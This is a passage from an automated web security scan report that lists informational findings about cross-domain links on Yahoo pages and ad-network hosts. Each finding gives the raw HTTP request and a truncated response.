HTTP/1.1
Host: global.ard.yahoo.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N6067.160910.7443114402621/B5129127.36;sz=120x60;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=15srre13t/M=601454399.602194378.673385551.687570551/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sGXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=2892168919546073312/R=1/X=3/*;ord=1315313295039208?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxid=016e3b4e6615bdb5; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 12:48:33 GMT
Cache-Control: private, max-age=0, no-cache
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Location: http://adclick.g.doubleclick.net/aclk?sa=L&ai=BaZK2kBZmTqqeLY2YjQSIjaSeBwAAAAAQASAAOABQ--WT1wVYq9PzFGDJ1vqGyKOgGYIBCWNhLWdvb2dsZbIBEWZpbmFuY2UueWFob28uY29tyAEJ2gGWAWh0dHA6Ly9maW5hbmNlLnlhaG9vLmNvbS9xO195bHQ9QXNqcWtvVkltWGNnY3JXQUVhQzdPTGJ4VmF4XztfeWx1PVgzb0RNVEZoWnpkcE5XUmpCSEJ2Y3dNeE1nUnpaV01EZVdacFUzbHRZbTlzVEc5dmEzVndVbVZ6ZFd4MGN3UnpiR3NEZUhOelpnLS0_cz1YU1MuRsACAqgDAdgEgK3iBOAEApoFGAj4ozYQ8eSyHxiVj-hwIKvT8xQokeucAaAGHw&num=0&sig=AOD64_0VY0xIBePsVX8cVgiDrhGM37PyFQ&client=&adurl=http://pixel.everesttech.net/2565/c%3Fev_ct%3Dd%26ev_sid%3D54%26ev_ci%3D1660002714%26ev_ai%3D1660082513%26ev_cri%3D1660643811%26url%3Dhttp%253A//landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/%253Futm_source%253Dyhofin%2526utm_medium%253Dpaid-banner-ads%2526utm_campaign%253D120x60-QuotesBttn%2526utm_content%253Dstock%253AoldGrnBlk
Connection: close
Content-Type: text/html; charset=utf-8

The document has moved <A HREF="http://adclick.g.doubleclick.net/aclk?sa=L&amp;ai=BaZK2kBZmTqqeLY2YjQSIjaSeBwAAAAAQASAAOABQ--WT1wVYq9PzFGDJ1vqGyKOgGYIBCWNhLWdvb2dsZbIBEWZpbmFuY2UueWFob28uY29tyAEJ2gGWAWh0dHA6Ly9maW5hbmNlLnlhaG9vLmNvbS9xO195bHQ9QXNqcWtvVkltWGNnY3JXQUVhQzdPTGJ4VmF4XztfeWx1PVgzb0RNVEZoWnpkcE5XUmpCSEJ2Y3dNeE1nUnpaV01EZVdacFUzbHRZbTlzVEc5dmEzVndVbVZ6ZFd4MGN3UnpiR3NEZUhOelpnLS0_cz1YU1MuRsACAqgDAdgEgK3iBOAEApoFGAj4ozYQ8eSyHxiVj-hwIKvT8xQokeucAaAGHw&amp;num=0&amp;sig=AOD64_0VY0xIBePsVX8cVgiDrhGM37PyFQ&amp;client=&amp;adurl=http://pixel.everesttech.net/2565/c%3Fev_ct%3Dd%26ev_sid%3D54%26ev_ci%3D1660002714%26ev_ai%3D1660082513%26ev_cri%3D1660643811%26url%3Dhttp%253A//landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/%253Futm_source%253Dyhofin%2526utm_medium%253Dpaid-banner-ads%2526utm_campaign%253D120x60-QuotesBttn%2526utm_content%253Dstock%253AoldGrnBlk">here</A>
...[SNIP]...

15.67. http://ib.adnxs.com/seg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /seg

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /seg?add=155746&redir=${SEG_IDS}&t=1 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_undefined;dc_seed=;tile=2;dcopt=ist;sz=300x250;ord=8383746361359954?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+Uxk1GOGkI/$_.v=_!`4hTmV3oY`#EoW=LnXT`HX)Ny^rF?u'>@*e?CDQ!(G@]1BW0Q<EQU#3!ZR*?l7/tm%40RO-2NpM_ZlEy!<e/e+ztxA; sess=1; uuid2=-1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 07-Sep-2011 12:46:03 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=-1; path=/; expires=Mon, 05-Sep-2016 12:46:03 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Tue, 06 Sep 2011 12:46:03 GMT
Content-Length: 456

document.write('<img src="http://ad.doubleclick.net/activity;src=2055485;dcnet=4845;boom=52987;sz=1x1;ord=1?" width="1" height="1"/>');document.write('<img src="http://b.scorecardresearch.com/b?c1=8&c2=6035145&c3=4845000000000000003&c4=&c5=&c6=&c15=&cv=1.3&cj=1" width="1" height="1"/>');document.write('<img src="http://tags.bluekai.com/site/4378" width="1" height="1"/>');document.write('<scr'+'ipt type="text/javascript" src="${SEG_IDS}">
...[SNIP]...

15.68. http://ib.adnxs.com/ttj  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ttj

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ttj?id=563719&cb=0.8985232759732753&pubclick=http://optimized-by.rubiconproject.com/t/6348/9844/16043-15.3218925.3243961?url= HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_undefined;dc_seed=;tile=2;dcopt=ist;sz=300x250;ord=8383746361359954?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+Uxk1GOGkI/$_.v=_!`4hTmV3oY`#EoW=LnXT`HX)Ny^rF?u'>@*e?CDQ!(G@]1BW0Q<EQU#3!ZR*?l7/tm%40RO-2NpM_ZlEy!<e/e+ztxA; sess=1; uuid2=-1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 07-Sep-2011 12:46:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=-1; path=/; expires=Mon, 05-Sep-2016 12:46:00 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Tue, 06 Sep 2011 12:46:00 GMT
Content-Length: 2659

document.write('<IFRAME SRC=\"http://ad.doubleclick.net/adi/N3340.dedicatedmedia.com/B5641952.2;sz=300x250;pc=[TPAS_ID];click0=http://ib.adnxs.com/click?AAAAAAAACEAAAAAAAAAIQAAAAEA3CRVAAAAAAAAACEAAAAA
...[SNIP]...
</scr'+'ipt><iframe src="http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe>
...[SNIP]...

15.69. http://l.yimg.com/j/assets/eJx9kOGOgyAQhJ9IRRSF3MOYLa6VVsAAXuPbH0gv8ZKzvyAz3yyzPHy1b6qipShJui0WRnSFVqZ0dd_zhn89zsho9bWJ32jCtS2tMSiDsuaaAaM0fEYe_n-3KZu8w9tk0WTJ9AhOzgN4r3yooqnydaCECMIpqbuGx0DbUFqnQCzqA5jgjydodzzhV-veSstEUhxODv18Tga4_SJdnmSfChPRc9YmZbYaB23HbcE_w4KST3RJ6RgjSXkpM9rXmfHSOgxzXr3rBU3iusCObshLnrs4WNWY_oHGfBK2JeT54vCnZbdbVnj9bqu1NdXu1yI2PM4R3AKJER1vL5jcwNiAhQYD97zGh8AEEm_xZyLG65bXF5hCUazKFMGBfCpzT1MJY_wH0NjgNg,,.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://l.yimg.com
Path:   /j/assets/eJx9kOGOgyAQhJ9IRRSF3MOYLa6VVsAAXuPbH0gv8ZKzvyAz3yyzPHy1b6qipShJui0WRnSFVqZ0dd_zhn89zsho9bWJ32jCtS2tMSiDsuaaAaM0fEYe_n-3KZu8w9tk0WTJ9AhOzgN4r3yooqnydaCECMIpqbuGx0DbUFqnQCzqA5jgjydodzzhV-veSstEUhxODv18Tga4_SJdnmSfChPRc9YmZbYaB23HbcE_w4KST3RJ6RgjSXkpM9rXmfHSOgxzXr3rBU3iusCObshLnrs4WNWY_oHGfBK2JeT54vCnZbdbVnj9bqu1NdXu1yI2PM4R3AKJER1vL5jcwNiAhQYD97zGh8AEEm_xZyLG65bXF5hCUazKFMGBfCpzT1MJY_wH0NjgNg,,.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /j/assets/eJx9kOGOgyAQhJ9IRRSF3MOYLa6VVsAAXuPbH0gv8ZKzvyAz3yyzPHy1b6qipShJui0WRnSFVqZ0dd_zhn89zsho9bWJ32jCtS2tMSiDsuaaAaM0fEYe_n-3KZu8w9tk0WTJ9AhOzgN4r3yooqnydaCECMIpqbuGx0DbUFqnQCzqA5jgjydodzzhV-veSstEUhxODv18Tga4_SJdnmSfChPRc9YmZbYaB23HbcE_w4KST3RJ6RgjSXkpM9rXmfHSOgxzXr3rBU3iusCObshLnrs4WNWY_oHGfBK2JeT54vCnZbdbVnj9bqu1NdXu1yI2PM4R3AKJER1vL5jcwNiAhQYD97zGh8AEEm_xZyLG65bXF5hCUazKFMGBfCpzT1MJY_wH0NjgNg,,.js?z&m HTTP/1.1
Host: l.yimg.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:39:40 GMT
Cache-Control: public, max-age=315360000
Expires: Fri, 03 Sep 2021 11:39:40 GMT
Vary: Accept-Encoding
Content-Type: application/x-javascript
Age: 3903
Content-Length: 202932
Proxy-Connection: keep-alive
Server: YTS/1.19.5


if(typeof YAHOO=="undefined"||!YAHOO){var YAHOO={};}YAHOO.namespace=function(){var b=arguments,g=null,e,c,f;for(e=0;e<b.length;e=e+1){f=(""+b[e]).split(".");g=YAHOO;for(c=(f[0]=="YAHOO")?1:0;c<f.leng
...[SNIP]...
</span><a href="http://fantasysports.yahoo.com/edit/usergames" class="edit" title="Edit my Teams and Leagues">Edit</a>
...[SNIP]...
<h6><a href="http://fantasysports.yahoo.com/">See All of My Teams &raquo;</a>
...[SNIP]...

15.70. http://l.yimg.com/p/social_buttons/facebook-share-iframe.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://l.yimg.com
Path:   /p/social_buttons/facebook-share-iframe.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /p/social_buttons/facebook-share-iframe.php?u=http%3A%2F%2Fnew.music.yahoo.com%2Fblogs%2Flive%2F13348%2Fred-hot-chili-peppers-exclusive-interview-new-album-new-member-new-video%2F&t=Red%20Hot%20Chili%20Peppers%20Exclusive%20Interview!%20New%20Album,%20New%20Member,%20New%20Video%20-%20Maximum%20Performance&l=Share&t_sec=mit_share&t_act=facebook HTTP/1.1
Host: l.yimg.com
Proxy-Connection: keep-alive
Referer: http://new.music.yahoo.com/blogs/live/13348/red-hot-chili-peppers-exclusive-interview-new-album-new-member-new-video/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:49:42 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: max-age=300, public
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.19.5
Content-Length: 2374

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>

<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/3.1.1/build/cssreset/reset-min.css">
<style>
...[SNIP]...
</a>

<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

15.71. http://l.yimg.com/zz/combo  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://l.yimg.com
Path:   /zz/combo

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /zz/combo?d/lib/yui/2.8.0r4/build/yahoo/yahoo-min.js&d/lib/yui/2.8.0r4/build/get/get-min.js&d/lib/yui/2.8.0r4/build/dom/dom-min.js&d/lib/yui/2.8.0r4/build/selector/selector-min.js&d/lib/yui/2.8.0r4/build/event/event-min.js&d/lib/yui/2.8.0r4/build/element/element-min.js&d/lib/yui/2.8.0r4/build/button/button.js&d/lib/yui/2.8.0r4/build/connection/connection-min.js&d/lib/yui/2.8.0r4/build/json/json-min.js&d/lib/yui/2.8.0r4/build/container/container-min.js&d/lib/yui/2.8.0r4/build/animation/animation-min.js&d/lib/yui/2.8.0r4/build/imageloader/imageloader-min.js&d/lib/ult/strip_1.12.js&pc/autos/p/common/autos_global-min-44130.js&pc/autos/p/mmt/autos_mmt_global-min-41705.js&pc/autos/p/common/autos_mvc-min-41705.js&pc/autos/p/common/autos_tabview-min-42088.js&d/lib/yat/yep/player_20100605.js&pc/autos/p/common/autos_video-min-41705.js&pc/autos/p/homepage/homepage-min-43199.js&pc/autos/p/mmt/autos_carousel-min-41705.js&pc/autos/p/homepage/userpickscarousel-min-43575.js&d/lib/darla/fc_0.2.9.js&d/lib/darla/util_0.2.6.js&d/lib/darla/renderers/complex_renderer_0.3.0.js HTTP/1.1
Host: l.yimg.com
Proxy-Connection: keep-alive
Referer: http://autos.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Cache-Control: max-age=315360000
Last-Modified: Tue, 06 Sep 2011 07:41:35 GMT
Content-Type: application/javascript
Expires: Mon, 16 Aug 2021 01:54:06 GMT
Date: Tue, 06 Sep 2011 07:41:35 GMT
Age: 18200
Content-Length: 396675
Server: YTS/1.19.5
Proxy-Connection: keep-alive

/*
Copyright (c) 2009, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.net/yui/license.txt
version: 2.8.0r4
*/
if(typeof YAHOO=="undefined"||!YAHOO){var YA
...[SNIP]...
</code> element to
* be used to create the button.
* @param {<a href="http://www.w3.org/TR/2000/WD-DOM-Level-1-20000929/level-
* one-html.html#ID-6043025">
HTMLInputElement</a>
...[SNIP]...
</code> element is to be checked.
* @return {<a href="http://www.w3.org/TR/2000/WD-DOM-Level-1-20000929/level-
* one-html.html#ID-6043025">
HTMLInputElement</a>
...[SNIP]...
</code>) that
* map to Button configuration attributes and sets them into a collection
* that is passed to the Button constructor.
* @private
* @param {<a href="http://www.w3.org/TR/2000/WD-DOM-Level-1-20000929/level-
* one-html.html#ID-6043025">
HTMLInputElement</a>|<a href="http://www.w3.org/
* TR/2000/WD-DOM-Level-1-20000929/level-one-html.html#ID-
* 48250443">
HTMLAnchorElement</a>
...[SNIP]...
</code> element.
* @default null
* @protected
* @type <a href="http://www.w3.org/TR/2000/WD-DOM-Level-1-20000929/
* level-one-html.html#ID-48250443">
HTMLAnchorElement</a>
...[SNIP]...
</code>
* element, or array of HTML form elements used to represent the button
* when its parent form is submitted.
* @default null
* @protected
* @type <a href="http://www.w3.org/TR/2000/WD-DOM-Level-1-20000929/
* level-one-html.html#ID-6043025">
HTMLInputElement</a>
...[SNIP]...
@method createButtonElement
* @description Creates the button's HTML elements.
* @param {String} p_sType String indicating the type of element
* to create.
* @return {<a href="http://www.w3.org/TR/2000/WD-DOM-Level-1-20000929/
* level-one-html.html#ID-58190037">
HTMLElement</a>
...[SNIP]...
},


/**
* @method createHiddenFields
* @description Creates the button's hidden form field and appends it
* to its parent form.
* @return {<a href="http://www.w3.org/TR/2000/WD-DOM-Level-1-20000929/
* level-one-html.html#ID-6043025">
HTMLInputElement</a>
...[SNIP]...
</code> element to
* be used to create the button.
* @param {<a href="http://www.w3.org/TR/2000/WD-DOM-Level-1-20000929/
* level-one-html.html#ID-6043025">
HTMLInputElement</a>
...[SNIP]...
</a>|<a href="http://www.w3.org/TR
* /2000/WD-DOM-Level-1-20000929/level-one-html.html#ID-33759296">

* HTMLElement</a>
...[SNIP]...
* @description HTML element reference or string specifying the id
* attribute of the HTML element that the button's markup should be
* rendered into.
* @type <a href="http://www.w3.org/TR/2000/WD-DOM-Level-1-20000929/
* level-one-html.html#ID-58190037">
HTMLElement</a>
...[SNIP]...
</code>)
* used to create the button.
* @type <a href="http://www.w3.org/TR/2000/WD-DOM-Level-1-20000929/
* level-one-html.html#ID-58190037">
HTMLElement</a>
...[SNIP]...
</a>|<a
* href="http://www.w3.org/TR/2000/WD-DOM-Level-1-20000929/level-
* one-html.html#ID-58190037">
HTMLElement</a>
...[SNIP]...

return this._menu;

},


/**
* @method getForm
* @description Returns a reference to the button's parent form.
* @return {<a href="http://www.w3.org/TR/2000/WD-DOM-Level-1-
* 20000929/level-one-html.html#ID-40002357">
HTMLFormElement</a>
...[SNIP]...
</code> element or
* array of form elements used to represent the button when its parent
* form is submitted.
* @return {<a href="http://www.w3.org/TR/2000/WD-DOM-Level-1-20000929/
* level-one-html.html#ID-6043025">
HTMLInputElement</a>
...[SNIP]...
oForm
* @description Searches the specified form and adds hidden fields for
* instances of YAHOO.widget.Button that are of type "radio," "checkbox,"
* "menu," and "split."
* @param {<a href="http://www.w3.org/TR/2000/WD-DOM-Level-1-20000929/level-
* one-html.html#ID-40002357">
HTMLFormElement</a>
...[SNIP]...
</code> element of the button group.
* @param {<a href="http://www.w3.org/TR/2000/WD-DOM-Level-1-20000929/
* level-one-html.html#ID-22445964">
HTMLDivElement</a>
...[SNIP]...

// Protected methods


/**
* @method _createGroupElement
* @description Creates the button group's element.
* @protected
* @return {<a href="http://www.w3.org/TR/2000/WD-DOM-Level-1-20000929/
* level-one-html.html#ID-22445964">
HTMLDivElement</a>
...[SNIP]...
</code> element of the button group.
* @param {<a href="http://www.w3.org/TR/2000/WD-DOM-Level-1-20000929/
* level-one-html.html#ID-22445964">
HTMLDivElement</a>
...[SNIP]...
* @description HTML element reference or string specifying the id
* attribute of the HTML element that the button group's markup
* should be rendered into.
* @type <a href="http://www.w3.org/TR/2000/WD-DOM-Level-1-20000929/
* level-one-html.html#ID-58190037">
HTMLElement</a>
...[SNIP]...
</code> element
* to be used to create the button to be added to the button group.
* @param {<a href="http://www.w3.org/TR/2000/WD-DOM-Level-1-20000929/
* level-one-html.html#ID-6043025">
HTMLInputElement</a>
...[SNIP]...

15.72. http://l.yimg.com/zz/combo  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://l.yimg.com
Path:   /zz/combo

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /zz/combo?/d/lib/map/js/api/ymapapi_3_8_2_3.js&/qf/static/js/4.3.21/map-201105050424.js HTTP/1.1
Host: l.yimg.com
Proxy-Connection: keep-alive
Referer: http://realestate.yahoo.com/search/New_York/New_York/homes-for-sale?typeBak=realestate&p=10010&type=classified&priceLow=&priceHigh=&bedroomLow=&bathroomLow=&search=Search
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Cache-Control: max-age=315360000
Last-Modified: Tue, 06 Sep 2011 00:47:47 GMT
Content-Type: application/javascript
Expires: Thu, 02 Sep 2021 18:41:27 GMT
Date: Tue, 06 Sep 2011 00:47:47 GMT
Age: 43330
Content-Length: 141089
Server: YTS/1.19.5
Proxy-Connection: keep-alive

/*
Copyright (c) 2009 Yahoo! Inc. All rights reserved. - version 3.8.2.3
*/
function YahooMapsAPIAjax(){var YMapConfig=new function(){this._list=["locale","imgPrefixURL","statURL","geoCoder","geoRSS",
...[SNIP]...
</iframe>':"";sw.dirt='<a href="http://maps.yahoo.com/dd?taddr='+escape(this._d.YMAPS_ADDRESS)+"&tlt="+this._d.GEO_LAT+"&tln="+this._d.GEO_LONG+"&tname="+this._d.TITLE+"&tcsz="+escape(csy)+" "+zip+'+&terr=12" target=_blank>To here</a>';sw.dirf='<a href="http://maps.yahoo.com/dd?newaddr='+escape(this._d.YMAPS_ADDRESS)+"&slt="+this._d.GEO_LAT+"&sln="+this._d.GEO_LONG+"&name="+this._d.TITLE+"&csz="+escape(csy)+" "+zip+'&oerr=12" target=_blank>From here</a>
...[SNIP]...

15.73. http://l.yimg.com/zz/combo  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://l.yimg.com
Path:   /zz/combo

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /zz/combo?kx/ucs/common/js/1/setup-min.js&kx/ucs/sts/js/83/skip-min.js&kx/ucs/menu_utils/js/134/menu_utils-min.js&kx/ucs/username/js/33/user_menu-min.js&kx/ucs/help/js/35/help_menu-min.js&kx/ucs/utility_link/js/15/utility_menu-min.js&kx/ucs/common/js/127/logo_debug-min.js&kx/ucs/homepage/js/124/homepage-min.js&kx/ucs/search/js/179/search-min.js HTTP/1.1
Host: l.yimg.com
Proxy-Connection: keep-alive
Referer: http://autos.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Cache-Control: max-age=315360000
Last-Modified: Tue, 06 Sep 2011 08:54:58 GMT
Content-Type: application/x-javascript
Expires: Sun, 30 Aug 2020 16:22:48 GMT
Date: Tue, 06 Sep 2011 08:54:58 GMT
Age: 13797
Content-Length: 20141
Server: YTS/1.19.5
Proxy-Connection: keep-alive

if(!window.ucs){window.ucs={};}YUI.add("ucs-skip-to-search",function(A){A.namespace("ucs");A.ucs.SkipToSearch=function(B){this.skipLink=B;this.init();};A.ucs.SkipToSearch.prototype={init:function(){th
...[SNIP]...
);},_hidePanel:function(C){C.halt();var B=this.container.one("div.yucs-sethp-panel"),D=this.container.one("div.pnt");D.addClass("hide");B.addClass("hide");},_loadBeacon:function(){var B=A.Node.create('<img width="0" height="0" src="http://us.lrd.yahoo.com/_ylc=X3oDMTFnNzFiMTJoBHRtX2RtZWNoA1RleHQgTGluawR0bV9sbmsDVTExMzA1NTYEdG1fbmV0A1lhaG9vIQ--/SIG=112cgufir/**http%3A/www.yahoo.com/%3Fmkt=3"/>');this.container.insert(B);},_setHpIe:function(C){C.halt();this.anchor.setStyle("behavior","url(#default#homepage)");this.anchor._node.setHomePage(this.container.one("a.yucs-sethp-panel-logo").getAttr
...[SNIP]...

15.74. http://landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://landing.optionshouse.com
Path:   /rate/395/yhofin/qbttn/stk_oldgb/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /rate/395/yhofin/qbttn/stk_oldgb/?utm_source=yhofin&utm_medium=paid-banner-ads&utm_campaign=120x60-QuotesBttn&utm_content=stock:oldGrnBlk HTTP/1.1
Host: landing.optionshouse.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N6067.160910.7443114402621/B5129127.36;sz=120x60;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=15srre13t/M=601454399.602194378.673385551.687570551/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sGXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=2892168919546073312/R=1/X=3/*;ord=1315313295039208?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: LiveBall=uid=699982&uky=G2W1TS8H&rid=764602; domain=optionshouse.com; expires=Wed, 05-Sep-2012 05:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:47:14 GMT
Content-Length: 14053


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">

<head id="ball_page_ti
...[SNIP]...
<!--end js code for font substitution-->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
...[SNIP]...
<a href="https://www.optionshouse.com/tool/current/app/accountSignup/page/createLogin.jsp" title="Open An Account Today" target="_blank"><img src="http://peak6.postclickmarketing.com/Global/ImageLib/Buttons/open_an_account_btn2.png" width="240" height="32" border="0" alt="Open An Account Today" style="display:block;"></a>
...[SNIP]...
<br>Our trading platform has evolved from more than a decade of testing and optimization. Tap into the same tools and technologies used by the options traders at <a href="http://www.peak6.com/" title="PEAK6 Investments" target="_blank">PEAK6 Investments<sup style="vertical-align: baseline; position: relative; bottom: .33em; font-size: 11px;">
...[SNIP]...
